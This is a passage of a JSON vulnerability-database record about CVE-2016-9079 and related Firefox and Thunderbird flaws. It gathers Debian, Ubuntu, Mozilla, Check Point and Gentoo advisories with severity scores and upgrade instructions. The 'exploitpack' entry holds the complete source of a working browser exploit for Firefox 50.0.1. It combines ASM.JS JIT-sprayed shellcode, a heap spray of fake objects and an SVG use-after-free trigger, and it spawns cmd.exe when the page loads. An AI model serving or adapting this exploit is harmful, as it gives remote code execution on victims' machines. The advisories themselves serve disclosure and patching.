"PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5290", "CVE-2016-5297", "CVE-2016-9064", "CVE-2016-5296", "CVE-2016-9079", "CVE-2016-5291", "CVE-2016-9066"], "modified": "2022-07-21T05:54:46", "id": "OSV:DLA-730-1", "href": "https://osv.dev/vulnerability/DLA-730-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-21T08:12:38", "description": "\nMultiple security issues have been found in Icedove, Debian's version of\nthe Mozilla Thunderbird mail client: Multiple memory safety errors,\nsame-origin policy bypass issues, integer overflows, buffer overflows\nand use-after-frees may lead to the execution of arbitrary code or\ndenial of service.\n\n\nFor Debian 7 Wheezy, these problems have been fixed in version\n45.5.1-1~deb7u1.\n\n\nWe recommend that you upgrade your icedove packages.\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-12-17T00:00:00", "type": "osv", "title": "icedove - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5290", "CVE-2016-5297", "CVE-2016-5296", "CVE-2016-9079", "CVE-2016-5291", "CVE-2016-9074", "CVE-2016-9066"], "modified": "2022-07-21T05:54:47", "id": "OSV:DLA-752-1", "href": "https://osv.dev/vulnerability/DLA-752-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T07:11:14", "description": "\nMultiple security issues have been found in Icedove, Debian's version of\nthe Mozilla Thunderbird mail client: Multiple memory safety errors,\nsame-origin policy bypass issues, integer overflows, buffer overflows\nand use-after-frees may lead to the execution of arbitrary code or\ndenial of service.\n\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 1:45.5.1-1~deb8u1.\n\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1:45.5.1-1 or earlier.\n\n\nWe recommend that you upgrade your icedove packages.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-12-11T00:00:00", "type": "osv", "title": "icedove - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5290", "CVE-2016-5297", "CVE-2016-5296", "CVE-2016-9079", "CVE-2016-5291", "CVE-2016-9074", "CVE-2016-9066"], "modified": "2022-08-10T07:11:10", "id": "OSV:DSA-3730-1", "href": "https://osv.dev/vulnerability/DSA-3730-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mozilla": [{"lastseen": "2021-12-29T14:12:15", "description": "A use-after-free vulnerability in SVG Animation has been discovered. An exploit built on this vulnerability has been discovered in the wild targeting Firefox and Tor Browser users on Windows.\n", "edition": 1, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-11-30T00:00:00", "type": "mozilla", "title": "Firefox SVG Animation Remote Code Execution \u2014 Mozilla", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9079"], "modified": "2016-11-30T00:00:00", "id": "MFSA2016-92", "href": "https://www.mozilla.org/en-US/security/advisories/mfsa2016-92/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "debiancve": [{"lastseen": "2023-03-25T06:06:30", "description": "A use-after-free vulnerability in SVG Animation has been discovered. An exploit built on this vulnerability has been discovered in the wild targeting Firefox and Tor Browser users on Windows. This vulnerability affects Firefox < 50.0.2, Firefox ESR < 45.5.1, and Thunderbird < 45.5.1.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-06-11T21:29:00", "type": "debiancve", "title": "CVE-2016-9079", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9079"], "modified": "2018-06-11T21:29:00", "id": "DEBIANCVE:CVE-2016-9079", "href": "https://security-tracker.debian.org/tracker/CVE-2016-9079", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "checkpoint_advisories": [{"lastseen": "2022-10-04T10:40:25", "description": "A remote code execution vulnerability exists in multiple Mozilla products. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-12-01T00:00:00", "type": "checkpoint_advisories", "title": "Mozilla Multiple Products Remote Code Execution (CVE-2016-9079; CVE-2017-5375)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9079", "CVE-2017-5375"], "modified": "2022-09-22T00:00:00", "id": "CPAI-2016-1063", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2023-01-26T13:20:15", "description": "## Releases\n\n * Ubuntu 16.10 \n * Ubuntu 16.04 ESM\n * Ubuntu 14.04 ESM\n * Ubuntu 12.04 \n\n## Packages\n\n * firefox \\- Mozilla Open Source web browser\n\nIt was discovered that data: URLs can inherit the wrong origin after a \nHTTP redirect in some circumstances. An attacker could potentially \nexploit this to bypass same-origin restrictions. (CVE-2016-9078)\n\nA use-after-free was discovered in SVG animations. If a user were tricked \nin to opening a specially crafted website, an attacker could exploit this \nto cause a denial of service via application crash, or execute arbitrary \ncode. (CVE-2016-9079)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-11-30T00:00:00", "type": "ubuntu", "title": "Firefox vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9078", "CVE-2016-9079"], "modified": "2016-11-30T00:00:00", "id": "USN-3140-1", "href": "https://ubuntu.com/security/notices/USN-3140-1", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-26T13:20:15", "description": "## Releases\n\n * Ubuntu 16.10 \n * Ubuntu 16.04 ESM\n * Ubuntu 14.04 ESM\n * Ubuntu 12.04 \n\n## Packages\n\n * thunderbird \\- Mozilla Open Source mail and newsgroup client\n\nChristian Holler, Jon Coppeard, Olli Pettay, Ehsan Akhgari, Gary Kwong, \nTooru Fujisawa, and Randell Jesup discovered multiple memory safety issues \nin Thunderbird. If a user were tricked in to opening a specially crafted \nmessage, an attacker could potentially exploit these to cause a denial of \nservice via application crash, or execute arbitrary code. (CVE-2016-5290)\n\nA same-origin policy bypass was discovered with local HTML files in some \ncircumstances. An attacker could potentially exploit this to obtain \nsensitive information. (CVE-2016-5291)\n\nA heap buffer-overflow was discovered in Cairo when processing SVG \ncontent. If a user were tricked in to opening a specially crafted message, \nan attacker could potentially exploit this to cause a denial of service \nvia application crash, or execute arbitrary code. (CVE-2016-5296)\n\nAn error was discovered in argument length checking in Javascript. If a \nuser were tricked in to opening a specially crafted website in a browsing \ncontext, an attacker could potentially exploit this to cause a denial of \nservice via application crash, or execute arbitrary code. (CVE-2016-5297)\n\nA buffer overflow was discovered in nsScriptLoadHandler. If a user were \ntricked in to opening a specially crafted website in a browsing context, \nan attacker could potentially exploit this to cause a denial of service \nvia application crash, or execute arbitrary code. (CVE-2016-9066)\n\nA use-after-free was discovered in SVG animations. If a user were tricked \nin to opening a specially crafted website in a browsing context, an \nattacker could exploit this to cause a denial of service via application \ncrash, or execute arbitrary code. (CVE-2016-9079)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-12-01T00:00:00", "type": "ubuntu", "title": "Thunderbird vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5290", "CVE-2016-5291", "CVE-2016-5296", "CVE-2016-5297", "CVE-2016-9066", "CVE-2016-9079"], "modified": "2016-12-01T00:00:00", "id": "USN-3141-1", "href": "https://ubuntu.com/security/notices/USN-3141-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:15", "description": "\nFirefox 50.0.1 - ASM.JS JIT-Spray Remote Code Execution", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-07-14T00:00:00", "type": "exploitpack", "title": "Firefox 50.0.1 - ASM.JS JIT-Spray Remote Code Execution", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9079", "CVE-2017-5375"], "modified": "2017-07-14T00:00:00", "id": "EXPLOITPACK:54C137ECE6DBBF9D0C30CE792A8A32E0", "href": "", "sourceData": "<!DOCTYPE HTML>\n\n<!--\n\n FULL ASLR AND DEP BYPASS USING ASM.JS JIT SPRAY (CVE-2017-5375)\n PoC Exploit against Firefox 50.0.1 (CVE-2016-9079 - Tor Browser 0day)\n\n Tested on:\n\n Release 50.0.1 32-bit - Windows 8.1 / Windows 10\n https://ftp.mozilla.org/pub/firefox/releases/50.0.1/win32/en-US/Firefox%20Setup%2050.0.1.exe\n\n Howto:\n\n 1) serve PoC over network and open it in Firefox 50.0.1 32-bit\n 2) if you don't see cmd.exe, open processexplorer and verify that cmd.exe was spawned by firefox.exe\n\n A successfull exploit attempt should pop cmd.exe\n\n Writeup: https://rh0dev.github.io/blog/2017/the-return-of-the-jit/\n \n (C) Rh0\n\n Jul. 13, 2017\n\n-->\n\n<script async>\nfunction asm_js_module(){\n \"use asm\";\n /* huge jitted nop sled */\n function payload_code(){\n var val = 0;\n val = (val + 0xa8909090)|0;\n val = (val + 0xa8909090)|0;\n val = (val + 0xa8909090)|0;\n val = (val + 0xa8909090)|0;\n val = (val + 0xa8909090)|0;\n val = (val + 0xa8909090)|0;\n val = (val + 0xa8909090)|0;\n val = (val + 0xa8909090)|0;\n val = (val + 0xa8909090)|0;\n val = (val + 0xa8909090)|0;\n val = (val + 0xa8909090)|0;\n val = (val + 0xa8909090)|0;\n val = (val + 0xa8909090)|0;\n val = (val + 0xa8909090)|0;\n val = (val + 0xa8909090)|0;\n val = (val + 0xa8909090)|0;\n val = (val + 0xa8909090)|0;\n val = (val + 0xa8909090)|0;\n val = (val + 0xa8909090)|0;\n val = (val + 0xa8909090)|0;\n val = (val + 0xa8909090)|0;\n val = (val + 0xa8909090)|0;\n val = (val + 0xa8909090)|0;\n val = (val + 0xa8909090)|0;\n val = (val + 0xa8909090)|0;\n val = (val + 0xa8909090)|0;\n val = (val + 0xa8909090)|0;\n val = (val + 0xa8909090)|0;\n val = (val + 0xa8909090)|0;\n val = (val + 0xa8909090)|0;\n val = (val + 0xa8909090)|0;\n val = (val + 0xa8909090)|0;\n val = (val + 0xa8909090)|0;\n val = (val + 0xa8909090)|0;\n val = (val + 0xa8909090)|0;\n val = (val + 0xa8909090)|0;\n val = (val + 0xa8909090)|0;\n val = (val + 0xa8909090)|0;\n val = (val + 0xa8909090)|0;\n val = (val + 0xa8909090)|0;\n /* 3 byte VirtualAlloc RWX stager */\n val = (val + 0xa890db31)|0;\n val = (val + 0xa89030b3)|0;\n val = (val + 0xa81b8b64)|0;\n val = (val + 0xa80c5b8b)|0;\n val = (val + 0xa81c5b8b)|0;\n val = (val + 0xa8b9006a)|0;\n val = (val + 0xa8904c4c)|0;\n val = (val + 0xa8902eb1)|0;\n val = (val + 0xa85144b5)|0;\n val = (val + 0xa8b99090)|0;\n val = (val + 0xa8903233)|0;\n val = (val + 0xa89045b1)|0;\n val = (val + 0xa8514cb5)|0;\n val = (val + 0xa8b99090)|0;\n val = (val + 0xa8904e52)|0;\n val = (val + 0xa8904bb1)|0;\n val = (val + 0xa85145b5)|0;\n val = (val + 0xa8590e6a)|0;\n val = (val + 0xa84fe789)|0;\n val = (val + 0xa8086b8b)|0;\n val = (val + 0xa820738b)|0;\n val = (val + 0xa8471b8b)|0;\n val = (val + 0xa82ae349)|0;\n val = (val + 0xa890c031)|0;\n val = (val + 0xa890ad66)|0;\n val = (val + 0xa89c613c)|0;\n val = (val + 0xa8077c9d)|0;\n val = (val + 0xa890202c)|0;\n val = (val + 0xa89c073a)|0;\n val = (val + 0xa8d7749d)|0;\n val = (val + 0xa890bdeb)|0;\n val = (val + 0xa8b9006a)|0;\n val = (val + 0xa890636f)|0;\n val = (val + 0xa8906cb1)|0;\n val = (val + 0xa8516cb5)|0;\n val = (val + 0xa8b99090)|0;\n val = (val + 0xa890416c)|0;\n val = (val + 0xa89075b1)|0;\n val = (val + 0xa85161b5)|0;\n val = (val + 0xa8b99090)|0;\n val = (val + 0xa8907472)|0;\n val = (val + 0xa89056b1)|0;\n val = (val + 0xa85169b5)|0;\n val = (val + 0xa890eb89)|0;\n val = (val + 0xa83cc583)|0;\n val = (val + 0xa8006d8b)|0;\n val = (val + 0xa890dd01)|0;\n val = (val + 0xa878c583)|0;\n val = (val + 0xa8006d8b)|0;\n val = (val + 0xa890dd01)|0;\n val = (val + 0xa820458b)|0;\n val = (val + 0xa890d801)|0;\n val = (val + 0xa890d231)|0;\n val = (val + 0xa890e789)|0;\n val = (val + 0xa8590d6a)|0;\n val = (val + 0xa810348b)|0;\n val = (val + 0xa890de01)|0;\n val = (val + 0xa890a6f3)|0;\n val = (val + 0xa8900de3)|0;\n val = (val + 0xa804c283)|0;\n val = (val + 0xa890dbeb)|0;\n val = (val + 0xa8247d8b)|0;\n val = (val + 0xa890df01)|0;\n val = (val + 0xa890ead1)|0;\n val = (val + 0xa890d701)|0;\n val = (val + 0xa890d231)|0;\n val = (val + 0xa8178b66)|0;\n val = (val + 0xa81c7d8b)|0;\n val = (val + 0xa890df01)|0;\n val = (val + 0xa802e2c1)|0;\n val = (val + 0xa890d701)|0;\n val = (val + 0xa8903f8b)|0;\n val = (val + 0xa890df01)|0;\n val = (val + 0xa890406a)|0;\n val = (val + 0xa890c031)|0;\n val = (val + 0xa85030b4)|0;\n val = (val + 0xa85010b4)|0;\n val = (val + 0xa890006a)|0;\n val = (val + 0xa890d7ff)|0;\n val = (val + 0xa890c931)|0;\n val = (val + 0xa89000b5)|0;\n val = (val + 0xa890c3b1)|0;\n val = (val + 0xa890ebd9)|0;\n val = (val + 0xa82434d9)|0;\n val = (val + 0xa890e689)|0;\n val = (val + 0xa80cc683)|0;\n val = (val + 0xa890368b)|0;\n val = (val + 0xa85fc683)|0;\n val = (val + 0xa890c789)|0;\n val = (val + 0xa81e8b66)|0;\n val = (val + 0xa81f8966)|0;\n val = (val + 0xa802c683)|0;\n val = (val + 0xa802c783)|0;\n val = (val + 0xa8901e8a)|0;\n val = (val + 0xa8901f88)|0;\n val = (val + 0xa803c683)|0;\n val = (val + 0xa801c783)|0;\n val = (val + 0xa803e983)|0;\n val = (val + 0xa89008e3)|0;\n val = (val + 0xa890cceb)|0;\n val = (val + 0xa890e0ff)|0;\n val = (val + 0xa824248d)|0;\n /* $ msfvenom --payload windows/exec CMD=cmd.exe EXITFUNC=seh */\n val = (val + 0xa882e8fc)|0;\n val = (val + 0xa8000000)|0;\n val = (val + 0xa8e58960)|0;\n val = (val + 0xa864c031)|0;\n val = (val + 0xa830508b)|0;\n val = (val + 0xa80c528b)|0;\n val = (val + 0xa814528b)|0;\n val = (val + 0xa828728b)|0;\n val = (val + 0xa84ab70f)|0;\n val = (val + 0xa8ff3126)|0;\n val = (val + 0xa8613cac)|0;\n val = (val + 0xa82c027c)|0;\n val = (val + 0xa8cfc120)|0;\n val = (val + 0xa8c7010d)|0;\n val = (val + 0xa852f2e2)|0;\n val = (val + 0xa8528b57)|0;\n val = (val + 0xa84a8b10)|0;\n val = (val + 0xa84c8b3c)|0;\n val = (val + 0xa8e37811)|0;\n val = (val + 0xa8d10148)|0;\n val = (val + 0xa8598b51)|0;\n val = (val + 0xa8d30120)|0;\n val = (val + 0xa818498b)|0;\n val = (val + 0xa8493ae3)|0;\n val = (val + 0xa88b348b)|0;\n val = (val + 0xa831d601)|0;\n val = (val + 0xa8c1acff)|0;\n val = (val + 0xa8010dcf)|0;\n val = (val + 0xa8e038c7)|0;\n val = (val + 0xa803f675)|0;\n val = (val + 0xa83bf87d)|0;\n val = (val + 0xa875247d)|0;\n val = (val + 0xa88b58e4)|0;\n val = (val + 0xa8012458)|0;\n val = (val + 0xa88b66d3)|0;\n val = (val + 0xa88b4b0c)|0;\n val = (val + 0xa8011c58)|0;\n val = (val + 0xa8048bd3)|0;\n val = (val + 0xa8d0018b)|0;\n val = (val + 0xa8244489)|0;\n val = (val + 0xa85b5b24)|0;\n val = (val + 0xa85a5961)|0;\n val = (val + 0xa8e0ff51)|0;\n val = (val + 0xa85a5f5f)|0;\n val = (val + 0xa8eb128b)|0;\n val = (val + 0xa86a5d8d)|0;\n val = (val + 0xa8858d01)|0;\n val = (val + 0xa80000b2)|0;\n val = (val + 0xa8685000)|0;\n val = (val + 0xa86f8b31)|0;\n val = (val + 0xa8d5ff87)|0;\n val = (val + 0xa80efebb)|0;\n val = (val + 0xa868ea32)|0;\n val = (val + 0xa8bd95a6)|0;\n val = (val + 0xa8d5ff9d)|0;\n val = (val + 0xa87c063c)|0;\n val = (val + 0xa8fb800a)|0;\n val = (val + 0xa80575e0)|0;\n val = (val + 0xa81347bb)|0;\n val = (val + 0xa86a6f72)|0;\n val = (val + 0xa8ff5300)|0;\n val = (val + 0xa86d63d5)|0;\n val = (val + 0xa8652e64)|0;\n val = (val + 0xa8006578)|0;\n val = (val + 0xa8909090)|0;\n\n return val|0;\n }\n return payload_code \n}\n</script>\n\n<script>\nfunction spray_asm_js_modules(){\n sprayed = []\n for (var i=0; i<= 0x1800; i++){\n sprayed[i] = asm_js_module()\n }\n}\n\n/* heap spray inspired by skylined */\nfunction heap_spray_fake_objects(){\n var heap = []\n var current_address = 0x08000000\n var block_size = 0x1000000\n while(current_address < object_target_address){\n var heap_block = new Uint32Array(block_size/4 - 0x100)\n for (var offset = 0; offset < block_size; offset += 0x100000){\n\n /* fake object target = ecx + 0x88 and fake vtable*/\n heap_block[offset/4 + 0x00/4] = object_target_address\n /* self + 4 */\n heap_block[offset/4 + 0x14/4] = object_target_address\n /* the path to EIP */\n heap_block[offset/4 + 0x18/4] = 4\n heap_block[offset/4 + 0xac/4] = 1\n /* fake virtual function --> JIT target */\n heap_block[offset/4 + 0x138/4] = jit_payload_target \n }\n heap.push(heap_block)\n current_address += block_size\n }\n return heap\n}\n\n/* address of fake object */\nobject_target_address = 0x30300000\n\n/* address of our jitted shellcode */\njit_payload_target = 0x1c1c0054\n\n/* ASM.JS JIT Spray */\nspray_asm_js_modules()\n\n/* Spray fake objects */\nheap = heap_spray_fake_objects()\n\n/* -----> */\n/* bug trigger ripped from bugzilla report */\nvar worker = new Worker('data:javascript,self.onmessage=function(msg){postMessage(\"one\");postMessage(\"two\");};');\nworker.postMessage(\"zero\");\nvar svgns = 'http://www.w3.org/2000/svg';\nvar heap80 = new Array(0x1000);\nvar heap100 = new Array(0x4000);\nvar block80 = new ArrayBuffer(0x80);\nvar block100 = new ArrayBuffer(0x100);\nvar sprayBase = undefined;\nvar arrBase = undefined;\nvar animateX = undefined;\nvar containerA = undefined;\nvar offset = 0x88 // Firefox 50.0.1\n\nvar exploit = function(){\n var u32 = new Uint32Array(block80)\n\n u32[0x4] = arrBase - offset;\n u32[0xa] = arrBase - offset;\n u32[0x10] = arrBase - offset;\n\n for(i = heap100.length/2; i < heap100.length; i++)\n {\n heap100[i] = block100.slice(0)\n }\n\n for(i = 0; i < heap80.length/2; i++)\n {\n heap80[i] = block80.slice(0)\n }\n\n animateX.setAttribute('begin', '59s')\n animateX.setAttribute('begin', '58s')\n\n for(i = heap80.length/2; i < heap80.length; i++)\n {\n heap80[i] = block80.slice(0)\n }\n\n for(i = heap100.length/2; i < heap100.length; i++)\n {\n heap100[i] = block100.slice(0)\n }\n\n animateX.setAttribute('begin', '10s')\n animateX.setAttribute('begin', '9s')\n containerA.pauseAnimations();\n}\n\nworker.onmessage = function(e) {arrBase=object_target_address; exploit()}\n//worker.onmessage = function(e) {arrBase=0x30300000; exploit()}\n\nvar trigger = function(){\n containerA = document.createElementNS(svgns, 'svg')\n var containerB = document.createElementNS(svgns, 'svg');\n animateX = document.createElementNS(svgns, 'animate')\n var animateA = document.createElementNS(svgns, 'animate')\n var animateB = document.createElementNS(svgns, 'animate')\n var animateC = document.createElementNS(svgns, 'animate')\n var idA = \"ia\";\n var idC = \"ic\";\n animateA.setAttribute('id', idA);\n animateA.setAttribute('end', '50s');\n animateB.setAttribute('begin', '60s');\n animateB.setAttribute('end', idC + '.end');\n animateC.setAttribute('id', idC);\n animateC.setAttribute('end', idA + '.end');\n containerA.appendChild(animateX)\n containerA.appendChild(animateA)\n containerA.appendChild(animateB)\n containerB.appendChild(animateC)\n document.body.appendChild(containerA);\n document.body.appendChild(containerB);\n}\n\nwindow.onload = trigger;\nsetInterval(\"window.location.reload()\", 3000)\n/* <----- */\n\n</script>", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2022-01-17T19:05:54", "description": "### Background\n\nMozilla SeaMonkey is a free and open-source Internet suite. It is the continuation of the former Mozilla Application Suite, based on the same source code. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Mozilla SeaMonkey. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process, cause a Denial of Service condition, or obtain sensitive information. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Mozilla SeaMonkey users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-client/seamonkey-2.46-r1\"\n \n\nAll Mozilla SeaMonkey-bin users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-client/seamonkey-bin-2.46\"", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-01-13T00:00:00", "type": "gentoo", "title": "Mozilla SeaMonkey: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 